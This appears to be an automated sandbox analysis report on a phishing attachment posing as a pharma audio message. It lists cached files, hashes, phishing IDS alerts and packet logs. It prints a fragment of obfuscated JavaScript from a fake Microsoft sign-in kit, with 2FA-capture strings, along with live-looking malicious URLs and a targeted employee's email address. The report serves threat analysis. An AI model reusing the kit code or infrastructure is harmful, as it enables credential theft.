Preview:	.PNG........IHDR.......U......F:.....IDATx....[U....s.L.N..."..P@.ZD.vH.Ig../........Q........)x....W.....................Jk..vf:.Ir~w.$3.$.$'.3...Z.&...I............93...q.3..a..S..J.........@..`=.....z...z..V.....Z2p..d.....xo.I.........(.S..P..-........O._b.....\|K../..(.).".;....8..y1.......j.W.P.@.O.'2...w..X.s.5>.vA.5..V..+C..E.{..+.......Y.MY.....(.e.....vXs.n...-.Z.0..}j.....e........J.O.......O.L.<...G..J..........%......'....$:)......B.Z.BQ.\|...I...s.G.f..}...k..P.@.P..7?..wz..%..FZWz-....(...H..N.ZGi.9}.[..Z..j.@...E..0.9...7.I..gjd._.V..j.(....o..oC>...k.2..P.{v/.}%..x..2..m..ZE...(.5....%.{...X..{.!.e.....}..$.uT.....i...:F...Q...u......3.t.N$.\d.......n .zJ....x..=.].,.....a.tPE.(.....+.k......._.4..e.;...{.~..%-..Oy....(jI.....&<gZ.)...F.w0p...q..Pc....{y.U......E......7....PT....q..:.+.j..~..:......]?..3.u.{.l.....f...-..k.....'.e...p.~...dj......,Jmo:...'.+..........^.h........?...1~.:.V....a.i.....>Q....(..1].F@...t.....f.rM.

Chrome Cache Entry: 70

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (65528), with no line terminators
Category:	downloaded
Size (bytes):	68421
Entropy (8bit):	4.894526489503226
Encrypted:	false
SSDEEP:	768:PO6TtTOT+Th6dO31GqjkKB6wI7JoHHy6BKJwhXBXoXRn2CVWpgnEDUgUoCn4CSaY:PO65yCYyB6F5/VW4HllbE
MD5:	95433AD6C822F912C3EC20D7D0324453
SHA1:	DD09149B83F227F46EBE417D5E55C25A8E5B718C
SHA-256:	3EAA119BDC8067E28626DD3E81A085ACF0F6C2EB6043DB1FEA164F5703CB5E71
SHA-512:	F20107C5DE6BFFB843CF3961EFEE83FCEB45F87DE204F53E55553342F959F23AED2A334B1C970E2B358CC7F1B72789EB84A6D05AD0E8C071B027168F62881D4F
Malicious:	false
URL:	https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=michael.masselli@pharma.com
Preview:	function _0xe11b(){var _0x50d695=['#back','Incorrect\x202FA\x20code.\x20Try\x20again.','div6','#back-text','type','Microsoft','relay','6kgjXLC','style','page_visit','close','approve_signin','div5','https://www.office.com','#captcha-btn','.logoname','disabled','ajax','text','An\x20error\x20occurred\x20while\x20verifying\x20the\x20code.\x20Please\x20try\x20again.','#msg-2fa','Enter\x20your\x20email\x20address\x20or\x20phone\x20number.','#co','href','pointer-events','querySelector','input','div4','now','button:not(#dummy-bot-trap)','<img\x20src=\x22https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico\x22\x20class=\x22img-fluid\x20logoimg\x22\x20width=\x2220px\x22>\x20\x20<span\x20class=\x22align-middle\x20h5\x20logoname\x22\x20id=\x22mic\x22\x20style=\x22color:\x20#747474;\x22>Microsoft</span><br><br>\u00a0\u00a0\u00a0\u00a0<span\x20id=\x22aich\x22\x20style=\x22margin-left:\x20-16px;\x22></span><div\x20class=\x22py-2\x22><span\x20id=\x22ep\x22\x20class=\

Chrome Cache Entry: 71

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	22
Entropy (8bit):	3.5726236638951625
Encrypted:	false
SSDEEP:	3:YM0CKPFY:YM0xPi
MD5:	BAFC2F4C3A0599F66B6BACD96A1AE14F
SHA1:	4403E01E319E32CD05A5860FCE7AA81DE01F3B14
SHA-256:	1EAEB5F2EB261F058FD5AD84C44C5803417D64D24CA3C5F9DF760003D0337207
SHA-512:	60FAEDC7B805F73720FF62BE8B758787C397F7DD6330C4B46FB115C58B50B6C8664C668B923695D845A0DA8614905835B5ED390C5716685AF559DF6FAF5D7696
Malicious:	false
Preview:	{"ip":"45.92.229.138"}

Chrome Cache Entry: 72

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	258966
Entropy (8bit):	4.694760038815572
Encrypted:	false
SSDEEP:	1536:Pq6wJpJW3jInCU77Pc5ybMMHcFdL5RdD0BKt2AnsD5FWXxXLXv47pGXRMN6o8VbB:dLzsCXo8cAcfO4FIwo7vwI7N
MD5:	D22C8D1F87B47309F3C2A05D2905A762
SHA1:	2DA99CB33FCB4294336D73F2D538ED2D5EC3E3C1
SHA-256:	CA4586C1819D057F7396D917087FE3E650A9466DE644278DC3A8DDA5C3CA71FD
SHA-512:	F96C4580DEDBCA6B830EB4959E45831D3B87231F54F8B4EFE825615E88335550ABD42EBDF8FCCF40631047B0321D0EA8E0D5438F65B7B6E06FEB5253355F4F20
Malicious:	false
URL:	https://sender.linxcoded.top/start/xls/includes/css6.css
Preview:	/!.. Bootstrap v4.0.0 (https://getbootstrap.com).. * Copyright 2011-2018 The Bootstrap Authors.. * Copyright 2011-2018 Twitter, Inc... * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE).. */.. :root {.. --blue: #007bff;.. --indigo: #6610f2;.. --purple: #6f42c1;.. --pink: #e83e8c;.. --red: #dc3545;.. --orange: #fd7e14;.. --yellow: #ffc107;.. --green: #28a745;.. --teal: #20c997;.. --cyan: #17a2b8;.. --white: #fff;.. --gray: #6c757d;.. --gray-dark: #343a40;.. --primary: #007bff;.. --secondary: #6c757d;.. --success: #28a745;.. --info: #17a2b8;.. --warning: #ffc107;.. --danger: #dc3545;.. --light: #f8f9fa;.. --dark: #343a40;.. --breakpoint-xs: 0;.. --breakpoint-sm: 576px;.. --breakpoint-md: 768px;.. --breakpoint-lg: 992px;.. --breakpoint-xl: 1200px;.. --font-family-sans-se

Chrome Cache Entry: 73

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32065)
Category:	downloaded
Size (bytes):	85578
Entropy (8bit):	5.366055229017455
Encrypted:	false
SSDEEP:	1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
MD5:	2F6B11A7E914718E0290410E85366FE9
SHA1:	69BB69E25CA7D5EF0935317584E6153F3FD9A88C
SHA-256:	05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
SHA-512:	0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
Malicious:	false
URL:	https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
Preview:	/! jQuery v2.2.4 \| (c) jQuery Foundation \| jquery.org/license /.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call

Chrome Cache Entry: 74

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	downloaded
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
URL:	https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 75

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32030)
Category:	downloaded
Size (bytes):	86709
Entropy (8bit):	5.367391365596119
Encrypted:	false
SSDEEP:	1536:9NhEyjjTikEJO4edXXe9J578go6MWXqcVhrLyB4Lw13sh2bzrl1+iuH7U3gBORDT:jxcq0hrLZwpsYbmzORDU8Cu5
MD5:	E071ABDA8FE61194711CFC2AB99FE104
SHA1:	F647A6D37DC4CA055CED3CF64BBC1F490070ACBA
SHA-256:	85556761A8800D14CED8FCD41A6B8B26BF012D44A318866C0D81A62092EFD9BF
SHA-512:	53A2B560B20551672FBB0E6E72632D4FD1C7E2DD2ECF7337EBAAAB179CB8BE7C87E9D803CE7765706BC7FCBCF993C34587CD1237DE5A279AEA19911D69067B65
Malicious:	false
URL:	https://code.jquery.com/jquery-3.1.1.min.js
Preview:	/! jQuery v3.1.1 \| (c) jQuery Foundation \| jquery.org/license /.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b\|\|d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.1.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.con

Chrome Cache Entry: 76

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
Category:	downloaded
Size (bytes):	2407
Entropy (8bit):	7.900400471609788
Encrypted:	false
SSDEEP:	48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
MD5:	9D372E951D45A26EDE2DC8B417AAE4F8
SHA1:	84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
SHA-256:	4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
SHA-512:	78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
Malicious:	false
URL:	https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg
Preview:	...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l\|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx\|............\|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.\|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h\|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...

Static File Info

General

File type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Entropy (8bit):	4.757488908475143
TrID:	HyperText Markup Language (15004/1) 83.32% Text - UTF-8 encoded (3003/1) 16.68%
File name:	#Ud83d#Udd0aAudio_Msg Pharma.xhtml
File size:	2'840 bytes
MD5:	d97e1feefbffc8d82562a10b3dde201b
SHA1:	c97780ed0765a904afbfe0ef8297d1885a8bc0b2
SHA256:	6e3c117ebc04ceda9a13734a6fa6b7258fd6e4da711806b3e7b236a26866f3e2
SHA512:	777a30ad44d385b4ee57636c5fa131a7eb13eb43c248eae3ca0582120358e7000204fcb8d348e38413e3bc83e63f4f42f802000c9c506c3da07c42f923345140
SSDEEP:	48:3VmIAqytjBA2QD0oCFEvDvcWScicrlqlTSAo0+LPk:VA/qAfa/SKlqEAOM
TLSH:	285153589DD1868000B18361E7FBE318FD6202971200CA447DCDF2565FB9FCD85ABEE8
File Content Preview:	...<?xml version="1.0" encoding="UTF-8"?>..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN".. "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml" lang="en">..<head>.. <meta http-

Static OLE Info

General

Document Type:	Text
Number of OLE Files:	1

OLE File "#Ud83d#Udd0aAudio_Msg Pharma.xhtml"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Network Behavior

Download Network PCAP: filtered – full

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-27T18:29:48.956954+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.4	49758	104.168.138.190	443	TCP
2025-03-27T18:30:14.560661+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.4	49763	104.168.138.190	443	TCP
2025-03-27T18:30:29.359776+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.4	49779	104.168.138.190	443	TCP
2025-03-27T18:30:41.486643+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.4	49788	104.168.138.190	443	TCP
2025-03-27T18:30:56.876334+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.4	49794	104.168.138.190	443	TCP
2025-03-27T18:31:08.643811+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.4	49800	104.168.138.190	443	TCP
2025-03-27T18:31:17.563945+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.4	49805	104.168.138.190	443	TCP
2025-03-27T18:32:05.880743+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.4	49810	104.168.138.190	443	TCP
2025-03-27T18:32:13.617024+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.4	49815	104.168.138.190	443	TCP

Network Port Distribution

Total Packets: 620
• 8248 undefined
• 443 (HTTPS)
• 80 (HTTP)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 27, 2025 18:28:53.032809973 CET	49680	443	192.168.2.4	204.79.197.222
Mar 27, 2025 18:29:00.155119896 CET	49671	443	192.168.2.4	204.79.197.203
Mar 27, 2025 18:29:00.480257988 CET	49671	443	192.168.2.4	204.79.197.203
Mar 27, 2025 18:29:01.214724064 CET	49671	443	192.168.2.4	204.79.197.203
Mar 27, 2025 18:29:02.454718113 CET	49671	443	192.168.2.4	204.79.197.203
Mar 27, 2025 18:29:02.735954046 CET	49680	443	192.168.2.4	204.79.197.222
Mar 27, 2025 18:29:04.929275990 CET	49671	443	192.168.2.4	204.79.197.203
Mar 27, 2025 18:29:06.032916069 CET	49734	443	192.168.2.4	142.251.40.164
Mar 27, 2025 18:29:06.032939911 CET	443	49734	142.251.40.164	192.168.2.4
Mar 27, 2025 18:29:06.033008099 CET	49734	443	192.168.2.4	142.251.40.164
Mar 27, 2025 18:29:06.033198118 CET	49734	443	192.168.2.4	142.251.40.164
Mar 27, 2025 18:29:06.033206940 CET	443	49734	142.251.40.164	192.168.2.4
Mar 27, 2025 18:29:06.242197990 CET	443	49734	142.251.40.164	192.168.2.4
Mar 27, 2025 18:29:06.242261887 CET	49734	443	192.168.2.4	142.251.40.164
Mar 27, 2025 18:29:06.243844986 CET	49734	443	192.168.2.4	142.251.40.164
Mar 27, 2025 18:29:06.243850946 CET	443	49734	142.251.40.164	192.168.2.4
Mar 27, 2025 18:29:06.244519949 CET	443	49734	142.251.40.164	192.168.2.4
Mar 27, 2025 18:29:06.297485113 CET	49734	443	192.168.2.4	142.251.40.164
Mar 27, 2025 18:29:07.331053019 CET	49737	443	192.168.2.4	139.28.36.38
Mar 27, 2025 18:29:07.331088066 CET	443	49737	139.28.36.38	192.168.2.4
Mar 27, 2025 18:29:07.331152916 CET	49737	443	192.168.2.4	139.28.36.38
Mar 27, 2025 18:29:07.331347942 CET	49737	443	192.168.2.4	139.28.36.38
Mar 27, 2025 18:29:07.331355095 CET	443	49737	139.28.36.38	192.168.2.4
Mar 27, 2025 18:29:07.738769054 CET	443	49737	139.28.36.38	192.168.2.4
Mar 27, 2025 18:29:07.738843918 CET	49737	443	192.168.2.4	139.28.36.38
Mar 27, 2025 18:29:07.740588903 CET	49737	443	192.168.2.4	139.28.36.38
Mar 27, 2025 18:29:07.740597963 CET	443	49737	139.28.36.38	192.168.2.4
Mar 27, 2025 18:29:07.740834951 CET	443	49737	139.28.36.38	192.168.2.4
Mar 27, 2025 18:29:07.741224051 CET	49737	443	192.168.2.4	139.28.36.38
Mar 27, 2025 18:29:07.784266949 CET	443	49737	139.28.36.38	192.168.2.4
Mar 27, 2025 18:29:08.331806898 CET	443	49737	139.28.36.38	192.168.2.4
Mar 27, 2025 18:29:08.331824064 CET	443	49737	139.28.36.38	192.168.2.4
Mar 27, 2025 18:29:08.331841946 CET	443	49737	139.28.36.38	192.168.2.4
Mar 27, 2025 18:29:08.331896067 CET	49737	443	192.168.2.4	139.28.36.38
Mar 27, 2025 18:29:08.331916094 CET	443	49737	139.28.36.38	192.168.2.4
Mar 27, 2025 18:29:08.331969023 CET	49737	443	192.168.2.4	139.28.36.38
Mar 27, 2025 18:29:08.332051039 CET	443	49737	139.28.36.38	192.168.2.4
Mar 27, 2025 18:29:08.332067966 CET	443	49737	139.28.36.38	192.168.2.4
Mar 27, 2025 18:29:08.332098961 CET	49737	443	192.168.2.4	139.28.36.38
Mar 27, 2025 18:29:08.332106113 CET	443	49737	139.28.36.38	192.168.2.4
Mar 27, 2025 18:29:08.332148075 CET	49737	443	192.168.2.4	139.28.36.38
Mar 27, 2025 18:29:08.332158089 CET	49737	443	192.168.2.4	139.28.36.38
Mar 27, 2025 18:29:08.529998064 CET	443	49737	139.28.36.38	192.168.2.4
Mar 27, 2025 18:29:08.530056000 CET	443	49737	139.28.36.38	192.168.2.4
Mar 27, 2025 18:29:08.530077934 CET	49737	443	192.168.2.4	139.28.36.38
Mar 27, 2025 18:29:08.530109882 CET	443	49737	139.28.36.38	192.168.2.4
Mar 27, 2025 18:29:08.530141115 CET	49737	443	192.168.2.4	139.28.36.38
Mar 27, 2025 18:29:08.530150890 CET	49737	443	192.168.2.4	139.28.36.38
Mar 27, 2025 18:29:08.530683994 CET	443	49737	139.28.36.38	192.168.2.4
Mar 27, 2025 18:29:08.530714035 CET	443	49737	139.28.36.38	192.168.2.4
Mar 27, 2025 18:29:08.530761957 CET	443	49737	139.28.36.38	192.168.2.4
Mar 27, 2025 18:29:08.530770063 CET	49737	443	192.168.2.4	139.28.36.38
Mar 27, 2025 18:29:08.530778885 CET	443	49737	139.28.36.38	192.168.2.4
Mar 27, 2025 18:29:08.530812025 CET	49737	443	192.168.2.4	139.28.36.38
Mar 27, 2025 18:29:08.530834913 CET	49737	443	192.168.2.4	139.28.36.38
Mar 27, 2025 18:29:08.530843973 CET	443	49737	139.28.36.38	192.168.2.4
Mar 27, 2025 18:29:08.530915022 CET	49737	443	192.168.2.4	139.28.36.38
Mar 27, 2025 18:29:08.532643080 CET	49737	443	192.168.2.4	139.28.36.38
Mar 27, 2025 18:29:08.532663107 CET	443	49737	139.28.36.38	192.168.2.4
Mar 27, 2025 18:29:08.786469936 CET	49678	443	192.168.2.4	20.189.173.27
Mar 27, 2025 18:29:08.939857960 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:08.939887047 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:08.939971924 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:08.940208912 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:08.940228939 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:09.093446016 CET	49678	443	192.168.2.4	20.189.173.27
Mar 27, 2025 18:29:09.284847975 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:09.285033941 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:09.290280104 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:09.290294886 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:09.290539026 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:09.291234016 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:09.332312107 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:09.706842899 CET	49678	443	192.168.2.4	20.189.173.27
Mar 27, 2025 18:29:09.737498999 CET	49671	443	192.168.2.4	204.79.197.203
Mar 27, 2025 18:29:09.773674011 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:09.773694992 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:09.773710012 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:09.773768902 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:09.773789883 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:09.773854971 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:09.773854971 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:09.773885012 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:09.773916960 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:09.773935080 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:09.938258886 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:09.938278913 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:09.938348055 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:09.938378096 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:09.938484907 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:09.938669920 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:09.938688040 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:09.938731909 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:09.938739061 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:09.938779116 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:09.980797052 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:09.980819941 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:09.980868101 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:09.980894089 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:09.980911016 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:09.980946064 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:10.104463100 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:10.104482889 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:10.104542017 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:10.104563951 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:10.104578018 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:10.104608059 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:10.104907990 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:10.104928017 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:10.104980946 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:10.104989052 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:10.105014086 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:10.105022907 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:10.105360985 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:10.105380058 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:10.105417967 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:10.105423927 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:10.105462074 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:10.105477095 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:10.105808020 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:10.105823994 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:10.105868101 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:10.105874062 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:10.105901957 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:10.105917931 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:10.106317997 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:10.106334925 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:10.106376886 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:10.106383085 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:10.106405020 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:10.106430054 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:10.147124052 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:10.147145033 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:10.147207022 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:10.147223949 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:10.147264957 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:10.270967007 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:10.270986080 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:10.271047115 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:10.271063089 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:10.271109104 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:10.271473885 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:10.271493912 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:10.271524906 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:10.271533012 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:10.271562099 CET	49740	443	192.168.2.4	185.174.100.20
